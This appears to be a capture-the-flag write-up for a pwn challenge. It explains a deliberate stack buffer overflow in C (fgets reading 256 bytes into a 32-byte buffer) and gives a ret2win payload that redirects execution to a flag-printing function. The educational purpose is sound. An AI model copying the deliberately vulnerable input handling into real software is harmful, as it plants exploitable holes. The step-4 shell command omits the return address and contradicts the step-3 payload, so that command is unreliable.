2023 Cyber Apocalypse: Questionnaire

#htb #ctf #pwn #buffer-overflow #bof #fgets

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryPwn
ChallengeQuestionnaire

Summary

This challenge teaches fundamental buffer overflow concepts through an educational questionnaire. The binary contains two functions: a vulnerable vuln() function and a hidden gg() function that displays the flag. By exploiting a buffer overflow, we can redirect program execution to the gg() function.

Analysis

The vulnerable code structure:

void gg(){
    system("cat flag.txt");
}


void vuln(){
    char buffer[0x20] = {0};  // 32-byte buffer
    fprintf(stdout, "\nEnter payload here: ");
    fgets(buffer, 0x100, stdin);  // Vulnerable: reads 256 bytes into 32-byte buffer
}


void main(){
    vuln();
}

Vulnerabilities identified:

  1. Buffer declared as 0x20 (32) bytes
  2. fgets() reads 0x100 (256) bytes
  3. No bounds checking
  4. A gg() function exists but is never called
  5. Stack canaries are disabled (based on challenge description)
  6. PIE (Position Independent Executable) is disabled

Attack objective: Overwrite the return address to point to gg() function instead of returning normally.

Solution

The exploitation process:

  1. Identify the gg() function address using GDB or objdump:

    Terminal window
    gdb ./test
    (gdb) p gg
    $1 = {<text variable, no debug info>} 0x401176 <gg>

  2. Determine offset to return address:

    • Buffer size: 0x20 (32 bytes)
    • Return address is typically 8 bytes after the buffer on 64-bit systems
    • Offset: 32 + 8 = 40 bytes (0x28)

  3. Craft the payload:

    # 40 bytes of padding + return address to gg() in little-endian
    payload = b'A' * 40 + b'\x76\x11\x40\x00\x00\x00\x00\x00'

  4. Send the payload:

    Terminal window
    printf 'A%.0s' {1..40} | (cat; cat) | ./test

Key Takeaways

  • fgets() is dangerous when the buffer size parameter exceeds actual buffer size
  • Always validate input size against buffer capacity
  • Stack canary bypass requires understanding stack layout
  • Disabled PIE makes function addresses predictable and exploitable
  • Return address overwriting redirects program execution
  • Buffer overflow exploitation requires precise offset calculation
  • Understanding the binary (via GDB or static analysis) is crucial
  • Even “educational” code can introduce critical vulnerabilities